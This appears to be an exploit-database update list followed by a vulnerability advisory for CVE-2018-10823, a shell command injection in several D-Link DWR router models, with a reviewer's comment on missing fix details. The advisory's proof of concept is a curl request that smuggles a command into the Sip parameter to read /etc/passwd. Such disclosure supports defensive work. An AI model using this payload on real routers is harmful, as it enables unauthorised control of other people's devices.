
15 changes to exploits/shellcodes

Adult Filter 1.0 - Denial of Service (PoC)
Microsoft Data Sharing - Local Privilege Escalation (PoC)
Webmin 1.5 - Web Brute Force (CGI)
exim 4.90 - Remote Code Execution
School ERP Pro+Responsive 1.0 - 'fid' SQL Injection
SIM-PKH 2.4.1 - 'id' SQL Injection
MGB OpenSource Guestbook 0.7.0.2 - 'id' SQL Injection
School ERP Pro+Responsive 1.0 - 'fid' SQL Injection
SIM-PKH 2.4.1 - 'id' SQL Injection
MGB OpenSource Guestbook 0.7.0.2 - 'id' SQL Injection
SG ERP 1.0 - 'info' SQL Injection
Fifa Master XLS 2.3.2 - 'usw' SQL Injection
Axioscloud Sissiweb Registro Elettronico 7.0.0 - 'Error_desc' Cross-Site Scripting
LANGO Codeigniter Multilingual Script 1.0 - Cross-Site Scripting
Apache OFBiz 16.11.04 - XML External Entity Injection
D-Link Routers - Command Injection
D-Link Routers - Plaintext Password
D-Link Routers - Directory Traversal
Linux/x86 - execve(/bin/cat /etc/ssh/sshd_config) Shellcode 44 Bytes
## Shell command injection

CVE: CVE-2018-10823

CVSS v3: 9.1
AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H

Description: An issue was discovered on D-Link routers:

DWR-116 through 1.06,
DWR-512 through 2.02,
DWR-712 through 2.02,
DWR-912 through 2.02,
DWR-921 through 2.02,
DWR-111 through 1.01,
and probably others with the same type of firmware.
An authenticated attacker may execute arbitrary code by injecting the shell command into the chkisg.htm page Sip parameter. This allows for full control over the device internals.

PoC:

Login to the router.
Request the following URL after login:
`$ curl http://routerip/chkisg.htm%3FSip%3D1.1.1.1%20%7C%20cat%20%2Fetc%2Fpasswd`
See the passwd file contents in the response.
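
Review bot: the Description stops at "full control over the device internals" without naming a fixed firmware version or any mitigation, and the affected list ends in "probably others with the same type of firmware", so a reader cannot tell from this file whether a given device is still exposed. Suggest adding a line that states the vendor fix status for each listed model (or that none is known) and an interim measure such as restricting who can reach the web administration interface, since the vector already records PR:H. The vector line would also be easier to consume by tooling if it carried its CVSS version prefix instead of relying on the "CVSS v3: 9.1" line above it.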